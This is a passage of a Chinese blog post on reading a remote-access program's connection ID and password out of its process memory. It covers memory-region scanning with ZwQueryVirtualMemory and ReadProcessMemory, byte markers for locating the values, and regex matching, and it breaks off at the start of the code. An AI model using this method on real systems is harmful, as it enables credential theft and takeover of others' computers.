<p blockindex=5>本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址</p>
<p blockindex=6>还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码</p>
<p blockindex=7>再用CE搜索一下ID</p>
<p blockindex=8><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3wAAANiCAYAAAA6yMvJAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeXhV1bn48e8+85w5JwmZyQAhzIMCMoiiguI8trZV24Jaq7TUTtrb3trp1mrBX0uVWod7rTjU1qGAgiCDCYhAmENIIGSex5Oc+Zz9+yNMQQIBgiJ9P88TH7PPXnutvc7Ow3nPWutdSkdHh6qqKgDhcJjj/7+zs5P29na6u7sJBoOEQiH648g1/hOd673/J/fdF0n6XQghhLg4KYryRTfhP9a59v1/8nvX33vXarXodDqsViuRkZE4HA40Gs3Ra2g0GpT29nZVVVWO/AB4PB6qqqowm83Y7XbsdjsOhwOj0XjebkoIIYQQQgghRP/5fD46OztxuVy4XC48Hg8pKSmYzWagJ+hT2traegV8jY2NNDU1MXjwYAYNGvQF34IQQgghhBBCiP6oqanhwIEDxMXF4XQ6AVBaW1uPTulsaGggEAiQnZ19NCoUQgghhBBCCPHl4PF4KC0tRa/X43Q60Rw/jbOpqUmCPSGEEEIIIYT4kjKbzWRnZ9PU1ITH40EDPQlaKisrGTx4sAR7QgghhBBCCPElZjabGTx4MIcOHUITDofp6OjAbDbLmj0hhBBCCCGEuAgMGjQIq9XaM8LX3t6Ow+H4otskhBBCCCGEEGKAOByOnjV83d3d2O32L7o9QgghhBBCCCEGiN1u7wn4gsHggAZ8zc3NzJkzh6FDh/L73/8et9s9YNcWQgghhBBCCHF6drsdHUAoFMJkMp3VRTo7O/nzn/9MSVUDVpORKRNGc/mMGdS2dlKniaSiM0BNTQ2xsbH85LHHaWps4vbbbuWOO24f0JsRQgghhBBCCHGMyWRCFw6HObI1w9nweDy8/c47FLeFcDgcHKqpZWdJGdXdYbpjsvikxsX/e2kpxqCbt1auoz2kY8SUdsLhMBqNZgBvRwghhBBCCCHE8XRnW3D//v20t7eTkpqKz+fDb4mjxRTDxxUdrN3+LvroBOzOQZS1+ynevRNvTRnEpKKPT0UTI9lAhRBCCCGEEOJ8O6uAr7W1lSXP/42du3fz9FNPkTMkjzqXjSZtJOi0xKYPJc2hx24y0KrEUBUVSzg2nZDBQoTViM1qGbDRvRXzFGazHPW5WQNyvS+TFfMUZu9eSGnBI2R90Y0RQgghhBBCXHDOKupasGABf136FgUHmpgz9wes2FZCa2c32kNbmRQo4b2ff5M3f7OA//3lfN797/v529emMElbR2r7PiwHN6FprjiD2lYwT1FQjvuZt+JsWv35KFs0uVdbz1+by9i/e6Cv2VdVi5h8tve0Yl7vcv3siLJFk/t9rhBCCCGEuLAtXrwYs9l80s/Jx/+YzWYWL178RTf3nCQnp7B06WunPW/p0tdIS0s/7+05qxG+Bx98EL+q8PpHn1IXMZiAJQ1t5Q7unD6W79x7N0MyUjEajSiKAsDE0cP5zX/9BHcgTDgUIjMtpV/1lC2aTPb8QuYuV1GPG8BbMW8yi7ILeORzHdZawTxlNixXOe1g4qTPY9Qti0cKVB45r3UcbxILS8+sz1fMU5i9ZC7LVZV+j7+WLWJy9nwKAeaeeSuFEEIIIcSFZ8GCBfz4xz9m2rRppzxv3bp1LFiwgAcffPBzatnAe/LJJ/nW3J4PsnfddedJz1m69DW+NXcuzy9Zct7bc1YB3/jx45k5fQ+7atsoNljRRkdz28hE7pt9GRPGj/vM+ZGRkVwyYcKZVbJiHtnzYWGp+pkgY9ZzBf0PIMS5K91LIfk8fiYR7Ip5h4O95/r9XpUtmkz2G7dTqqqUzlOYfTZtFUIIIYQQFxyv18u0adOYPn36ac/9xS9+cd7bcz4dCfL6CvqOD/b6CggH0hlP6Wxvb6dwSxH17V1ExyYQ8nSj6PVk5I+hI6hh2er1LFuznmUffczKtet5f+UqPv300zOspYxFv1rCpIUv93tEqfdUynl8ZjLgidMSJy+i7MQ6JysnvUbPtWezBFgyu+f1yYvKTqyhf/c1uWda42nbe8JUyMmLVhwte+yU4+/jDK592r44dyveXsKkhY+eUWCe9UgBqqxHFEIIIYQQX3J33XUnzy9Zwrfmzu01vfPzDvbgLEb4PvnkE55Y/DJbdpeg2mMhdTiBYIj/eekf6Fsq0fq7UYGQqhKJj7CrhemXTeT111/vfyVly3ijEPL7O6S0ZDbfWFiKqmZxZOrl7Ml5x6ZVrpiHMns3C0tVCrKgJzjKJnsyR88pW/QkvKyiHvf60Ws8UoD6yBlM6Tyb9s678WjimeOnsh6pa8U8hdmFQP65Xbs/fXGisv27gUJmK8eGnOeesh9W8PYSyF8OiyYrzC88fPhzmeoqhBBCCCHEF+/Ekb4j//95BntwFiN8Dz/8MFVVlUTHxWGNT4SYZNAZiI+0kZIyiOTsoQzKyMLi68BVX0FWRiozZsw4i6ZNIi+7v6cu5OWjQ4GzeHThJCjcSylwZLRw7vLj159l8cjLC5lU+AbLDg9tZT3yXO/XH5973DXOUOF8spWTjxb22d4lbx8+ZwVPzi9k0sLSXgHVrOdKWTipH3Wf8tr964sTZT1SgKqqR39KF05iyezTJ21ZMvsbPUG0qqKqpSxkPtnnYTRRCCGEEOLL6nRJTE78EV8ux4/0fRHBHoDuyIf4/nrmmWfQmKyoGh2bKpr59cq9aJUwd15xKVNyBhEZFQXhMD5XGyG/l8iICFJTU8/jLQD5OX2PGh0eLSycrXCyJZH5pXCkcE+SkeNfPcusIacbyTple/ezG8jPOctxsAHqi1PJeqSA5XsVZv9qEY/OOsl9Hr6H3lNyewLLN7Ln8+SKR859lFQIIYQQ4iJwJp/DhTgbZzyl8+qrrwbgo48+Yt+WjagdPkKRCZQfPMhVQ5KYPm7EubcqK4d8CnljWRmPDFAqztNNQZynzGYJxyUZWTEP5SLNGnLqvuif7LxJ0Ne2EFk5PTNPzzZoFUIIIYQQ4iJwYjbO02XvPB/OKkunqqps2LSZN9/6J2SOQ1U0fHDgEBG6MKASYTUzZswYDAbD0fM9Hi8FhYUEQmHS01LJTE/DZDL1UcMsbpwLS+Y/yYpH+p/l8aQOBx+795fBrD4CkBVvs4RJLCw9VlfPurXTLZg7D/psbyl7+7OG76yufeZK9xZC/uN9DAhmkzcJ3jhpPWcwVVcIIYQQQogvqb4StHzeQd9ZbbweDodxJKSQPnQ46REGMrsPoo1J4u8f7+ErD36fRx/7L0oOHKS2oZHa+gZq6hrYVVzM1799P7fcez9/efEVampqTllHz5q1JcxWJtM7IWYZiyafeOyUV+LRhZMonJ/de81Z2SIm9zpQyN7SY69942imkd527z/fK9B6gt3C+d/odY8r5s0+6TTMM712//qitxXzevd32aLJzF4yiYWPHgmPVzCv16bqPWsge9ezgnnZ8ymc+/jhaZ4nlhFCCCGEEOLi0Few11f2zvPprEb4tFot9912PbfNnolGqwVV5YFfLeIDTzcdEVP5tK2aa+6djzbgJuz392Tt1JtodqSjxqZTWNFKzvLlfPe73z1FLT0bi1+7aDLZ2Qrzjx4/8w3Asx4poJTJZB+/dm3SQkoLDgcss56jdOHuY69PWkjp8rlk95rSOYvnls9FmZ2NMh8mLSyloK9GFM4nW5nf+9jc5ajP9W9oa9ZzKstRmH3cfc9dXsrC3dnMP2XJ0zttX5y0PS+zf7KCcjQGPnF/vZ4RvRMKoZbmMTlb4ejy4rnLj2ULPVkZIYQQQghxUTKZTKxbt+60561bt+4UswC/HE639cLp9ukbaEptba26c+fOo2vzzoSqqnR3d/PKK6+weFkBJQEbChAueh9FqyWUMoKwNRpaa6B0I4rBjHrJLcSZddw6LJ7/98sfo9Gc1SDjf6Ce7RPm5x8fNAkhhBBCCHHhW7x4MQsWLMDr9Z7yPJPJxFNPPcWDDz74ObVs4KWlpfO73/3utIHc0qWv8eijj1JdXXVe23NOAR+A1+tlzZo1/GLh
<p blockindex=9>可以看到在密码的附近都是有很多ID</p>
<p blockindex=10>用的是遍历可以不用知道具体的位置剩下的就是要思考怎么让遍历的内存更准确遍历0000000-7FFF0000肯定是可以的但是这样会出现很多误报因为后面是准备使用正则匹配的难免会匹配到别的字符串</p>
<p blockindex=11>先用x32dbg查看下内存的属性</p>
<p blockindex=12><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB4AAAAP9CAYAAABsUXDKAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeVhb5503/K9WELtkg9lsA8I7XoDgLV6SEOKmadI0NZN0PJ20M09p+kzbeWbazrTvez1PM307TTNtpp08bdqh0zZukk4SyNJsjk1IvcQ2Nga8rwh5B7NIbAKtR+8fWpCEliMhFuPv57pcjHTOfe6z6LjR9/zuW+J0Op0gIiIiIiIiIiIiIiIiIqLbnnS6O0BERERERERERERERERERPHBAJiIiIiIiIiIiIiIiIiIaJZgAExERERERERERERERERENEvIxSx069YtHD9+HA0NDQCAqqoqrFmzBvPmzZvUzhERERERERERERERERERkXh+AbDZbIZcLodcPvayxWJBS0sL3n//fZw9exYAMDo6CofDgcrKSiQkJHiXHR0dhdlshlqtnqLuExERERERERERERERERGRh18AvGfPHigUChQXF6OwsBB9fX3YvXs3Dh48iPb2dgwNDQEAzp8/D7vdjr6+PjzyyCNITU2FTqfDhQsXYLFY8PnPf35adoaIiIiIiIiIiIiIiIiI6E7mFwC3trZCqVRCoVAgNzcXly5dwkcffYQLFy7A4XB4lxsYGMDx48dhsViwbNkyLF++HFeuXMHJkydhtVoZABMRERERERERERERERERTQO/AFilUmFoaAj9/f2wWCxob2/H4OCgX/jr4XA40N/fj9OnT6OoqAgGgwEmkwlpaWlT1vnppG+sRYOxAtXbS8EBr2mm0TfWokVTje2lY1ensa0ejah0v6ZHY20LNNXbUaqOvG6412cmI9rq69CsrkJNZSGA8Z/Z2D7Dk9VuqM21ob5OB63fedKjsbYBqKpBJRpR22BERZDz6Fq9HnXNBkBbhWpNi+vvwWh4L5seka8nIiIiIiIiIiIiottVf38/PvzwQwwODo57LyMjA+Xl5dBqtdPQs/h55ZVXsG7dehQXh9+P9nYdjh49gr/8y7+ckn75BcDLly9HU1MTrl+/DolEgqSkJEil0pArS6VSJCUlQSKRQKfTwWw2Y/369SGX94YRIWgqpjdc0jfWokGnRVVNJQrHvev7RX0G+o3T0MFZLOi1ERBKBQYjwa8nTcgwLBLX+RfTjiuA0/m8oq2qQaXnojG2ob6uGYE9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
<p blockindex=13>从CE上看ID和密码就在这块内存里面这里有个特征就是这块内存的大小是1FF000后面会用到</p>
<p blockindex=14>那么思路就是先得到进程的基址然后遍历所有内存块基址找到一个1FF000大小的内存遍历内部内容得到ID密码这样遍历的内存也不会很大也可以降低匹配误差</p>
<h2 blockindex=15>0x02 需要用到的函数和结构</h2>
<p blockindex=16>下面介绍一下需要用到的函数和结构</p>
<h3 blockindex=17>ZwQueryVirtualMemory</h3>
<pre blockindex=18><code class="hljs language-c++"><span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle, <span class=hljs-comment>//进程句柄</span>
PVOID BaseAddress, <span class=hljs-comment>//内存地址</span>
MEMORY_INFORMATION_CLASS MemoryInformationClass, <span class=hljs-comment>//选择需要的内存信息,下面介绍</span>
PVOID MemoryInformation, <span class=hljs-comment>//指向MEMORY_BASIC_INFORMATION结构的指针</span>
SIZE_T MemoryInformationLength, <span class=hljs-comment>//MEMORY_BASIC_INFORMATION结构的大小</span>
PSIZE_T ReturnLength <span class=hljs-comment>//返回结构的大小</span>
)</span></span>;
</code></pre>
<p blockindex=19>这个函数就是获取内存块的属性然后存放到MEMORY_BASIC_INFORMATION结构</p>
<h3 blockindex=20>MemoryInformationClass</h3>
<pre blockindex=21><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
</code></pre>
<p blockindex=22>这是一个枚举类型选择需要什么内存信息这里需要遍历内存选择MemoryBasicInformation就可以</p>
<h3 blockindex=23>MEMORY_BASIC_INFORMATION</h3>
<pre blockindex=24><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>struct</span> _<span class=hljs-title>MEMORY_BASIC_INFORMATION</span> {</span>
PVOID BaseAddress; <span class=hljs-comment>//内存块的起始地址</span>
PVOID AllocationBase; <span class=hljs-comment>//指向VirtualAlloc函数等开辟的内存的地址的指针</span>
DWORD AllocationProtect;
<span class=hljs-comment>//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> defined (_WIN64)</span>
WORD PartitionId; <span class=hljs-comment>//不知道msdn没写</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span></span>
SIZE_T RegionSize; <span class=hljs-comment>//内存块的大小</span>
DWORD State; <span class=hljs-comment>//内存块的状态</span>
DWORD Protect; <span class=hljs-comment>//内存块当前的属性</span>
DWORD Type; <span class=hljs-comment>//内存块的类型</span>
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
</code></pre>
<h3 blockindex=25>EnumProcessModules</h3>
<pre blockindex=26><code class="hljs language-c++"><span class=hljs-function>BOOL WINAPI <span class=hljs-title>EnumProcessModules</span><span class=hljs-params>(
_In_ HANDLE hProcess, <span class=hljs-comment>//进程的句柄</span>
_Out_writes_bytes_(cb) HMODULE* lphModule, <span class=hljs-comment>//存放模块的数组</span>
_In_ DWORD cb, <span class=hljs-comment>//数组的大小</span>
_Out_ LPDWORD lpcbNeeded <span class=hljs-comment>//所有模块的存储在lphModule中的字节数</span>
)</span></span>;
</code></pre>
<p blockindex=27>这个函数主要是用来找到进程的基地址</p>
<p blockindex=28><img src="data:image/png;base64,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
<p blockindex=29>可以看到进程的基地址是偏向上面的,只要往下遍历就好</p>
<h2 blockindex=30>0x03 实现过程</h2>
<ol blockindex=31>
<li>EnumProcessModules得到进程的基地址</li>
<li>用do...while循环配合ZwQueryVirtualMemory得到内存块属性如果不是1FF000就加上内存块的大小跳到下一个内存块如果是的话直接得到模块的基地址然后遍历这个模块的内存</li>
<li>用ReadProcessMemory将内存读出来</li>
<li>用正则表达式加特征匹配内存中的字符</li>
</ol>
<p blockindex=32>关于最后一点的特征光知道大小只能定位模块还需要知道一些ID密码附近的内存特征</p>
<p blockindex=33>发现ID的前面会有个0x80后面会用0x000x00结尾</p>
<p blockindex=34>密码前面有0x88用0x000x00结尾</p>
<p blockindex=35>还有一个坑点就是unicode的正则表达式匹配没找到特别好的方法</p>
<p blockindex=36>还好这里都是英文和数字只要取出13579位置的值然后放入一个char类型的数组中就可以用正则匹配了</p>
<p blockindex=37>如下</p>
<pre blockindex=38><code class="hljs language-php"><span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>72</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>A <span class=hljs-number>00</span> <span class=hljs-number>32</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>D <span class=hljs-number>00</span> <span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span>
<span class=hljs-number>5</span>rj2am5a unicode
取出<span class=hljs-number>1</span> <span class=hljs-number>3</span> <span class=hljs-number>5</span> <span class=hljs-number>7</span> <span class=hljs-number>9</span> <span class=hljs-number>11</span> <span class=hljs-number>13</span> <span class=hljs-number>15</span>存入char类型的数组就可以用正则了
</code></pre>
<h2 blockindex=39>0x04 代码实现 x32</h2>
<pre blockindex=40><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
